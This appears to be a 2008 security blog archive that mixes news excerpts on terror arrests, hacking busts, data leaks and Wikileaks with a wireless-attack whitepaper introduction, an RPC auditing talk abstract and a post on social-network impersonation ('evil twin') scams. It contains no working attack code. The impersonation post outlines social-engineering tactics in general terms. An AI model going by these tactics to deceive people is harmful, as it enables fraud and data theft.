I have been working with 802.11 wireless technologies for a couple years now and although things are starting to improve, I still do not see many step by step or “How to” guides that give detailed instruction on performing 802.11 wireless attacks ( aside). The focus of this whitepaper is to provide a step by step walkthrough of popular wireless attacks. There are some areas where I just point you in the right direction, usually towards the right tool, but ideally, these areas will be further described and covered in the next release of the paper. By understanding the mindset and methodologies an attacker uses, we can better defend against those attacks. Although I’ll provide a brief background into 802.11, this paper should not serve as a comprehensive guide to the 802.11 standard, but instead should provide you with adequate information to understand 802.11 attacks. I’ll continue to update this paper as I further experiment with new attacks, so please stay tuned for updates.

More Arrests in Morocco Plot

Via Al-Jazeera -

A total of 35 people, members of the al-Badil al-Hadari (Civilised Alternative), an Islamist party, have now been arrested in Morocco, over an alleged plot to conduct political assassinations and carry out crimes internationally.

Police also linked its leader to an alleged "terrorist network".

"Based on information provided by individuals in custody, a [new] stock of explosives and detonators had been found in a hideout in Nador [northern Morocco]," a police source said.

Nine Kalashnikov rifles, two machine-guns, seven machine-pistols, 16 handguns and an arsenal of explosives and detonating devices were already seized earlier this week as 32 alleged members of the group were taken into custody on Monday and Tuesday.

Mustapha Moatassim, the party's secretary-general, was among those arrested.Abdelhafid Sriti, correspondent for Al Manar television in Morocco, was also detained.

Mohamed Ayyadi, spokesperson for al-Badil al-Hadari, said: "For us, it is astonishing news because since we founded our party we have made it clear that democracy is our goal and we have proved that ... we were among the first parties to condemn al-Qaeda and the use of violence in politics."

The detainees are accused of planning to kill senior army officers, government ministers and some Moroccan Jews, Chakib Benmoussa, the interior minister, announced on Wednesday.

He told a news conference: "The network has a two-pronged strategy: one for political activity, with al-Badil al-Hadari as its public face, and another clandestine focusing on military action.

"The network set up a military wing named Special Action Group."

Benmoussa said the party had links with an organisation called the Moroccan Islamic Combatant Group (GICM) and Algeria's Salafist Group for Preaching and Combat (GSPC), which last year changed its name to the Al-Qaeda Organisation in the Islamic Maghreb.

According to Benmoussa, the network had contacts with al-Qaeda in Afghanistan in 2001.

US Diplomats Say Deposed Judges Issue is Internal Pakistan Matter

Via (Pakistan) -

ISLAMABAD: The United States has now decided to respect the wishes of Pakistani voters and has finally given a go-ahead to the two main winners to resolve all the issues according to the wishes of their voters, including the issue of the deposed Supreme Court judges. US diplomats, who met some top leaders of PPP and PML-N in the last two days, have conveyed the view that the restoration of the deposed judges was an internal issue of Pakistan and the US would not interfere in any internal political or legal issue.

Spokesperson of the US Embassy in Pakistan, Elizabeth Colton, made it clear on Friday that US diplomats were meeting the politicians just to understand the ground situation and for supporting the democracy.

She said: “The US ambassador and other US Embassy officials regularly meet with representatives of various political parties, and continue to do so. We continue to express our support of the democratic transition.”

When The News asked that why US considered Musharraf indispensable for its interests in Pakistan, she responded: “Through the electoral process, the Pakistani people have expressed their views. It is up to those elected to form a government. We hope that Pakistan’s political leaders will work together to advance a common agenda and meet the challenges ahead. We look forward to working with that government, whoever its leaders will be.”

Observers said it was clear that the Zardari-Nawaz alliance announced on Thursday night had forced the US to change its position on supporting Musharraf, who had announced a few days ago that restoration of the judges was not possible.

In response to a question as to why the US is opposing the restoration of Justice Iftikhar Muhammad Chaudhry and some other judges, spokesperson Colton said: “The United States has stated its support for an independent media and an independent judiciary. Pakistan’s judicial issue is a matter for Pakistanis to address.” It is learnt that Bush administration conveyed serious reservations about Justice Iftikhar Muhammad Chaudhry to the leadership of the PPP when late Benazir Bhutto had announced her support for the deposed CJ.

After the surprising election results, US officials started meeting PPP and PML-N leaders and listened to their views on the restoration of judges. PML-N said that if some American judges could release prisoners from Guantanamo Bay, then why a Pakistani judge could not order the release of a person who was thrown behind bars many years ago and no charge was proved against him.

Malaysian Bloggers Warned & Being Monitored

Via -

A Malaysian government minister has accused bloggers, who have been writing avidly on upcoming elections, of being cowards and warned they are being monitored, a report said Friday.

Youth and Sports Minister Azalina Othman said opposition parties were using blogs to get their message out because they believed the Home Affairs Ministry was busy monitoring reports in the mainstream media, the Star daily said.

"They think they can get away with it but it is not the case as they too are being monitored," she reportedly said, adding that bloggers were cowards and a nuisance to the ruling party.

Opposition parties have resorted to blogs, SMS messaging and YouTube in their campaign for the March 8 polls, to dodge a virtual blackout on mainstream media.

Major newspapers and television stations -- many partly owned by parties in the ruling coalition -- have given blanket coverage to the government and its achievements since the election was called.

The opposition parties rate barely a mention, but thanks to the Internet they have begun campaigning feverishly in cyberspace with the aim of reaching young, urban, educated voters.

Media watchdog Reporters Without Borders ranks Malaysia 124 out of 169 on its worldwide press freedom index, and says the main media are "often compelled to ignore or to play down the many events organised by the opposition".

The government has previously threatened that bloggers could be punished under draconian internal security laws which provide for detention without trial.

DoE Starts Work on Exascale Supercomputer

Via Gov Computer News -

Two Energy Department labs are building a supercomputer that will be capable of executing more than one quintillion floating-point operations/sec, or one exaflop, the department announced this week.

Sandia National Laboratories and Oak Ridge National Laboratory are collaborating on the system. Congress has allotted $7.4 million for the project in fiscal 2008.

The computer will work on tough scientific problems, such as modeling how large numbers of particles interact with one another.

“An exascale computer is essential to perform more accurate simulations that, in turn, support solutions for emerging science and engineering challenges in national defense, energy assurance, advanced materials, climate and medicine,” said James Peery, Sandia's director of computation, computers and math, in a statement.

The plan to build an exaflop computer is an ambitious one. In comparison, an exaflop is 1,000 times faster than a petaflop, which is 1,000 trillion flops.

No existing supercomputer system has achieved petaflop performance yet, though the National Science Foundation has funded IBM to build such a machine.

Today's fastest supercomputer, Lawrence Livermore National Laboratory's BlueGene/L System, has a processing speed of 478.2 trillion teraflops.


The fastest publicly known supercomputer, that is...

Friday, February 22, 2008

World's First Wooden Sports Car Unveiled

Via People's Daily Online (China) -

A U.S. design company has created the world's first wooden supercar, which would put both Porsche and Lamborghini in the shade with a staggering top speed of 240 mph, media reported Thursday.

The 4.6 meter-long, two-seater "Splinter" car, made from maple, plywood and MDF, has a 4.6 liter V8 petrol engine and a six-speed gearbox.

It weighs 1,134 kilograms -- 240 kilograms less than the lightweight Porsche 911 GT3. Despite its power, it will achieve 20 mpg, according to its designer, Joe Harmon, 27.

"Wood is a truly amazing material to work with," Harmon said.

"It has a higher strength-to-weight ratio than aluminium or steel, and it possesses a versatility that makes many different types of construction techniques possible."

The car is due to hit the road later this year. The design company, Joe Harmon Design, has not yet decided on a price for the supercar.


Find out more information about this project at

Thursday, February 21, 2008

Microsoft Releases Office File Format Specifications

Microsoft, in accordance with its Open Specification Promise, has released the following file specifications to the public.

Word 97-2007 Binary File Format (.doc) Specification
PowerPoint 97-2007 Binary File Format (.ppt) Specification
Excel 97-2007 Binary File Format (.xls) Specification
Excel 2007 Binary File Format (.xlsb) Specification
Office Drawing 97-2007 Binary Format Specification

This is good news for open source developers who want to build products that work with these file types (think OpenOffice, etc), but the release of these file format details is sure to grab the attention of vulnerability hunters as well.

File fuzzers can now be tuned to the exact file specification, thus increasing their efficiency in finding possible security issues.

This is going to be an interesting topic to watch....

Missile Hits Dying US Spy Satellite

Via Washington Post -

WASHINGTON -- A missile launched from a Navy cruiser soared 130 miles above the Pacific and smashed a dying and potentially deadly U.S. spy satellite Wednesday, the Pentagon said. Several defense officials said it apparently achieved the main aim of destroying an onboard tank of toxic fuel.

Officials had expressed cautious optimism that the missile would hit the satellite, which was the size of a school bus. But they were less certain of hitting the smaller, more worrisome fuel tank, whose contents posed what Bush administration officials deemed a potential health hazard to humans if it landed intact.

In a statement announcing that the attack on the satellite, the Pentagon said, "Confirmation that the fuel tank has been fragmented should be available within 24 hours." It made no mention of early indications, but several defense officials close to the situation said later that all indications point to the destruction of the fuel tank. One explained that observers saw what appeared to be an explosion, indicating that the tank was hit.

Because the satellite was orbiting at a relatively low altitude at the time it was hit by the missile, debris will begin to re-enter the Earth's atmosphere immediately, the Pentagon statement said.

"Nearly all of the debris will burn up on re-entry within 24-48 hours and the remaining debris should re-enter within 40 days," it said.

The Six Golden Flowers - China’s Female Hackers

Via The Dark Visitor -

It is rare to find mention of the role women play in Chinese hacker society, so I was surprised to find a page dedicated to the “Six Golden Flowers.” The text written on the pictures gives a small history of their years in hacking but little else.

Digging a little further showed that in 2007, security media sources inside China named one of the members of the “Six Golden Flowers” as the most active and influential Chinese hacker in the country.


Thanks to pdp @ GNUCITIZEN for the link.

International Hacking Network Busted in Canada

Via cbcNews -

Quebec provincial police say they've dismantled a computer hacking network that targeted unprotected personal computers around the world.

Police raided several homes across Quebec on Wednesday and arrested 16 people in their investigation, which they say uncovered the largest hacking scam in Canadian history.

The hackers collaborated online to attack and take control of as many as one million computers around the world that were not equipped with anti-virus software or firewalls, said provincial police captain Frederick Gaudreau.

"That way, they were able to introduce some Trojans or worms in those computers, and that way they were able to take control of the computers from abroad," he said at a Montreal news conference on Wednesday.

The majority of computers attacked by the network were in Poland and Brazil, but some PCs in Manitoba and the United States were also hacked, he said.

Several government computers were also compromised, but investigators will not say in which country.

The computers were used to set up fake websites that solicited users to click on them and provide personal information, Gaudreau said.

Police won't reveal what the information was used for but investigators estimate that the network profited by as much as $45 million.

The 14 suspects arrested Wednesday are between the ages of 17 and 26, and face charges related to the unauthorized use of computers.


Sounds like a phishing / botnet ring....

Wednesday, February 20, 2008

The Growing Challenge of Fighting Terrorist Financing

The United States and its allies have made considerable progress in tackling terrorist financing since 9/11 -- one of the few areas of success in the global counterterrorism efforts. Serious challenges have emerged, however, which could threaten the record to date. As governments have cracked down on terrorist financing, the growing number of terrorist cells and organizations have found new ways to raise, store, and move funds. Keeping pace with these rapid changes is an uphill struggle for government bureaucracies. International cooperation on these issues also continues to decrease as 9/11 grows more distant. Additionally, in spite of some positive steps taken by the Persian Gulf countries, the region remains a key source of terrorist funds, and European efforts in this area are still uneven. Addressing all of these issues will be essential for continued success in combating terrorist financing.


This is a pretty good Op-ed piece by Michael Jacobson, a senior fellow in The Washington Institute's Stein Program on Counterterrorism and Intelligence. He is author of The West at War: U.S. and European Counterterrorism Efforts, Post-September 11 and previously served as a senior advisor in the Treasury Department's Office of Terrorism and Financial Intelligence.

In addition, he is a Contributing Expert @

Dallas Police Web Site Hacked, Defaced

Via FoxNews -

DALLAS — The Dallas Police Department Web site was shut down Monday night after a hacker took over the site with anti-American rants. Whoever hacked into the site also posted a doctored photograph showing American troops watching over four people lined up against a wall.

Each of the four prisoners had lines leading away from their faces to individual head shots of President Bush, Vice President Dick Cheney, Secretary of State Condoleezza Rice and Sen. John McCain, according to Dallas-Fort Worth television station KTVT.

"My understanding is that no internal police data has been affected," police spokesman Lt. Vernon Hale said.

Hale said the department's technology staff will work to get the site back up. He said he was unaware of hackers ever taking over the site before.

IBM Experimenting With DNA to Build Chips

Via ZDNet -

Scientists at IBM are conducting research into arranging carbon nanotubes--strands of carbon atoms that can conduct electricity--into arrays with DNA molecules. Once the nanotube array is meticulously constructed, the laboratory-generated DNA molecules could be removed, leaving an orderly grid of nanotubes. The nanotube grid, conceivably, could function as a data storage device or perform calculations.

"These are DNA nanostructures that are self-assembled into discrete shapes. Our goal is to use these structures as bread boards on which to assemble carbon nanotubes, silicon nanowires, quantum dots," said Greg Wallraff, an IBM scientist and a lithography and materials expert working on the project. "What we are really making are tiny DNA circuit boards that will be used to assemble other components."

The work, which builds on the groundbreaking research on "DNA origami" conducted by California Institute of Technology's Paul Rothemund, is only in the preliminary stages. Nonetheless, a growing number of researchers believe that designer DNA could become the vehicle for turning the long-touted dream of "self-assembly" into reality.

Chips made on these procedures could also be quite small. Potentially, DNA could address, or recognize, features as small as two nanometers. Cutting-edge chips today have features that average 45 nanometers. (A nanometer is a billionth of a meter.)


Technosorcery at its best!

Wikileaks Down, But Not Out

Via Guardian Unlimited Blog -

It was inevitable, given the nature of the site, that the 'whistleblowing service' Wikileaks would find itself
the subject of a legal injunction.

From the start, the site had readied itself by setting up servers in Belgium and India as well as the US but, as they said yesterday, they "never expected to be using the alternative servers to deal with censorship attacks from, of all places, the United States".

The site was shut down by California district court judge Jeffrey White after Swiss investment bank Julius Baer issued an injunction; the site had publishing several hundred pages of information that alleged the bank was involved in money laundering and tax evasion in the Cayman Islands. The information was posted anonymously on Wikileaks - the site's modus operandi - but is believed to be from a former employee who is the subject of a court case.


It appears that mirror sites are up and working.

Read more about this case over at Computerworld.
"It seems to me the judge may not have fully understood the way the Internet works and has issued an order that is overly broad and violative for First Amendment rights." said David Ardia, director of the Citizen Media Law Project at Harvard Law School.

Japan Brings Down Godzilla of Spam

Via The Register -

Japanese police have arrested a "prolific spammer" who allegedly bombarded inboxes with hundreds of millions of messages punting internet gambling and dating sites.

Investigators reckon Yuki Shiina, 25, sent as many as 2.2 billion spam messages using what appears to be rudimentary spamming techniques. He allegedly purchased a list of 600,000 email addresses for a pricey ¥100,000 ($927), earning ¥2m ($18,540) through a subsequent spamming campaign, security vendor Sophos reports.

Shiina reportedly faked the message headers of junk mail he sent in a bid to avoid detection, an offence against local anti-spam laws. There's no mention of the use of compromised machines to send spam - standard practice for junk mail scumbags over recent years, and a powerful technique to frustrate both basic spam blocking and investigatory techniques.

Complaints from a local ISP over the volume of junk mail it was processing resulted in an investigation that led onto Shiina's arrest by Tokyo's finest.

American Women Charged With Smuggling

Via FoxNews -

American mom Marisa Ann Sketo-Kirsh appeared in a South African court Jan. 28 for negotiating the sale of spark plugs. Yes, you read right — spark plugs. Her charge: importing and exporting “components of nuclear devices.”

It may be surprising to some that a common, everyday spark plug — or the igniter of a spark plug to be more precise, called a trigger spark gap — could be a weapon of mass destruction. Here’s why:

A spark gap is a cylinder set on a 4-inch square black box that emits an intense electrical pulse, whose timing and duration are controlled to the microsecond.

Hospitals use the devices to power lithotripters to deliver an electrical pulse that breaks up kidney stones.

These triggered spark gaps, however, also have another use: to detonate a nuclear bomb. Each of the switches could be installed into an enriched uranium casing, which could be mounted on a ballistic missile — with a consequence of … well, you know the rest.

This South African case is a sneak peak into murky and sometimes dangerous world of black-market nuclear weapons proliferation, teeming underworld movers and shakers, and maybe even terrorists. Items being sold here are not the stuff of Hollywood — glowing bits of enriched nuclear material — but dull-looking industrial parts, having viable commercial value but can be used for military purposes. The U.S. government calls these “dual use” items.

Police in South Africa allege the 46-year-old Sketo-Kirsh, aka Marisa Sketo, ordered 66 spark gaps from the U.S. firm PerkinElmer Optronics. She is believed to be working for and with Asher Karni, owner of Top Cape Technology company in South Africa. Sketo-Kirsh is thought to have sent the spark gaps to a Pakistani company without first obtaining a permit from South Africa’s WMD Nonproliferation Council.

According to the U.S. Justice Department, Karni, an Israeli Orthodox Jew, was cutting a deal with Humayun Khan from Islamic Pakistan in summer 2003 to export 200 spark gaps. These devices are easily concealed as they are small enough to fit into a coat pocket. The innocuous looking switches combined can pack enough punch to detonate 3-10 nuclear bombs, according to experts.

Its intended users, according to prosecutor Jay Bratt, were Pakistan and its arch rival, India.

Harvard Site Hacked and Leaked Onto PirateBay

Via DailyApps -

The Website of Harvard Graduate School of Arts and Sciences seems to have had what you call major security breach. The whole of the website complete with Server backups, Databases of Students, Site Databases, and the Complete directory structure have been leaked onto BitTorrent.

At the time of writing this, a 125MB Zip File is being tracked by Pirate Bay.

According to Torrentfreak, the Harvard University website has become a victim of a major security breach. A Torrent that is currently available on Piratebay claims to be a complete backup of the Website of Graduate School of Arts and Sciences.

The Torrent basically contains a 125MB Zip file that contains the entire directory structure of the site, and the major database backups. Details of the databases are below :

joomla.sql - claims to be the database for the Harvard site
contacts.sql - claims to be a database of contacts
hgs.sql - stated as ‘other minor thing’

Here’s what the release notes from the Torrent reads as in Broken English : ” Maybe you don’t like it but this is to demonstrate that persons like tgatton(admin of the server) in they don’t know how to secure a website.”

The guy basically refers to Thomas Gatton, Systems Administrator and User Support Specialist at Harvard. Not much is known about the reason behind the security breach. And also at the moment the site that was hacked seems to be down.

I am waiting for Harvard to come out with a clear explanation as to what is happening. At the moment the files contained in the Zip seem to be the real deal.



There really isn't another way to spin this story.

Harvard can't claim that the attacker didn't access the database on the site, if he dl'd the whole thing and then handed it to everyone in the world.

Tuesday, February 19, 2008

National Consumer Council Finds Unfair EULAs

Via BBC -

The National Consumer Council (NCC) has accused 17 firms, including Microsoft, Adobe and Symantec, of using unfair "end user licence agreements" (EULAs).

The NCC has asked the Office of Fair Trading to launch an investigation.

The NCC said the firms' EULAs were misleading customers into "signing away legal rights".

"Software rights-holders are shifting the legal burden on to consumers who buy computer programmes, leaving them with less protection than when they buy a cheap Biro," said Carl Belgrove of the NCC.

"Consumers can't have a clue what they're signing up to when some terms and conditions run to 10 or more pages.

"There's a significant imbalance between the rights of the consumer and the rights of the holder," he added.

'Legal responsibility'

As one of the firms named by the NCC, Microsoft said it had not seen the details of the report and was unable to comment.

But it added that it was committed to dealing "fairly" with consumers and addressing any concerns they might have.

The NCC looked at 25 software packages and said that in 17 instances, the packaging did not tell potential buyers they would have to sign an EULA in order to use it.

While some contained the EULA inside an instruction manual, or let it be read online, this was only after the software had been bought.

"This means that consumers are unable to make informed decisions before they buy a product, yet are being forced to take on an unknown level of legal responsibility," said the NCC.

After examining the contents of the EULAs, the NCC also said that some contained potentially unfair clauses.

Monday, February 18, 2008

Introduction to Social Networks Evil Twin Attacks

Via -

Lets have a look at a social network like LinkedIn. For those of you who don’t know what LinkIn is, let me say that it is probably the largest professional social network available today. Once you give information about your place of work and the education centers you used to attend, LinkedIn will try its best to hook you up to everyone else that have been associated with your current company, university, etc. The benefit is obvious: you keep up with people who may help you in the future. However, nothing stops an evil mind to register an account on the name of John Dawson, a reputable IT security expert, currently employed by HSBC, Canary Wharf, London. If the evil twin of John Dawson inhabits LinkedIn, how many people will trust that shady persona and as such be fooled into one of the biggest scams? I find this question very interesting and quite fascinating from the hacker point of view.

The hack here is not technical but rather psychological. Remember, hacking is the action of outsmarting the others and as such it may take any form. Fooling people’s believes is an important craft that have been with us since the dawn of humanity, yet we often fail to acknowledge it effectiveness. These are what Evil Twin attack are all about. From WiFi security prospective the evil twin is the rogue access point that pretends to be a friendly network. From the social networks point of view, the evil twin is a hacker or a bot masking himself as the real person.

Social Networks Evil Twin Attacks work both ways. First, the impersonator will be given the chance to trick the victim’s current friends into a trap. Second, he will trick people, who will try to contact the real person along the way, into a trap as well. Therefore, if the evil John Dawson is approached by someone who is looking for work in his sector, he will be in a very comfortable position to gain internal insights of the company of that person as very often people tend to serve any juicy information on the interviewing process.

Social Networks are huge threat whether you realize it or not. The bad guys are not restricted in terms of types of tools for their malicious activities, like whitehats do as this seams to be part of technical eliteness. The bad guys will break into the targeted network by any means necessary. This includes fooling people, laying and cheating on their way towards their goal.

Cayman Islands Bank Gets Wikileaks Taken Offline in U.S.

Via -

Wikileaks, the whistleblower site that recently leaked documents related to prisons in Iraq and Guantanamo Bay, was taken offline last week by its U.S. host after posting documents that implicate a Cayman Islands bank in money laundering and tax evasion activities.

In a pretty extraordinary ex-parte move, the Julius Baer Bank and Trust got Dynadot, the U.S. hosting company for Wikileaks, to agree not only to take down the Wikileaks site but also to " lock the domain name to prevent transfer of the domain name to a different domain registrar." A judge in the U.S. District Court for Northern California signed off on the stipulation between the two parties last week without giving Wikileaks a chance to address the issue in court.

The Julius Baer Bank, a Swiss bank with a division in the Cayman Islands, took issue with documents that were published on Wikileaks by an unidentified whistleblower, whom the bank claims is the former vice president of its Cayman Islands operation, Rudolf Elmer. The documents purport to provide evidence that the Cayman Islands bank helps customers hide assets and wash funds.

After unsuccessfully convincing Wikileaks to take down the documents, the bank went after its U.S. hosting service, which responded by agreeing not only to remove the Wikileaks account from Dyndadot's server but also to help prevent Wikileaks from moving its site to a different host.

Julie Turner, an attorney in California who represented Wikileaks prior to this latest litigation but is not counsel for the group on this matter, is surprised that the court sanctioned such a broad agreement.

"It’s like saying that Time magazine published one page of sensitive material so (someone can) seize the entire magazine and put a lock on their presses," she says.

Turner says she had been speaking with the bank last month on Wikileaks' behalf when the negotiations fell through.

"The bank wanted the documents taken down and Wikileaks was not prepared to do so. It was a pretty short negotiation," she says.

IKEA & Lego

Anyone see the resemblance?



Photo of the Day - Singapore Air Force

Via BBC -

F-16 jets from the Republic of Singapore Air Force (RSAF) perform stunts during a rehearsal for an aerobatics display at the Singapore Airshow.


Very Top Gun-ish.

DeepSec 2007 - RPC Auditing Tools and Techniques

"RPC interfaces have historically been the source of many high profile vulnerabilities. While the protocol itself is well understood, it's specifications make manual auditing tedious and difficult. The strict on-the-wire checks make communicating with an RPC server an aggravating process. Padding issues, complex embedded structures, lack of documentation, alignment, context handles, and debugging issues make crafting large requests near impossible. Our presentation will address all of these issues and we will release tools to automate the RPC auditing process. Our framework will automate the discovery of RPC servers, locating modules that define the interfaces, parsing of IDL files, and generation of client code to speak with the servers"

Video -

Slides -

Much respect to my friends at Tipping Point...

Tehreek Islami Lashkar-e-Mohammadi Gang Arrested in Pakistan

Via Daily Times (Pakistan) -

KARACHI: Ten members of the newly formed Tehreek Islami Lashkar-e-Mohammadi were arrested Friday with weapons, explosives, chemicals and poison, Jihadi literature, and hit lists of high-profile people, politicians, international and national NGOs and police officials. The organization is anti-Semitic.

The police held a press conference with IG Azhar Ali Farooqui, DIG South Javaid Ali Shah Bukhari, DIG CID Saud Ahmed Mirza, SSP Raja Umer Khattab and SP Lyari Town Fayyaz Khan to disclose the findings.

The IGP said that the alleged militants had passed a message to the government, political parties, intelligence agencies, the police, NGOs, welfare associations, judges, lawyers, international financers and businessmen, clerics and scholars of religious parties: “We announce the promulgation of the Islamic Shariah Emirate Islamia Pakistan on behalf of Lashkar-e-Mohammadi. Following the promulgation, any act contrary to the provisions of the Shariah will not be tolerated anywhere in Pakistan.” They did not contact the media and the IG said he could not say why.

The men were arrested in coordination with the district Crime Investigation Department (CID) police after a spy informed them that a newly formed terrorist organization was engaged in planning for Election Day and the days after.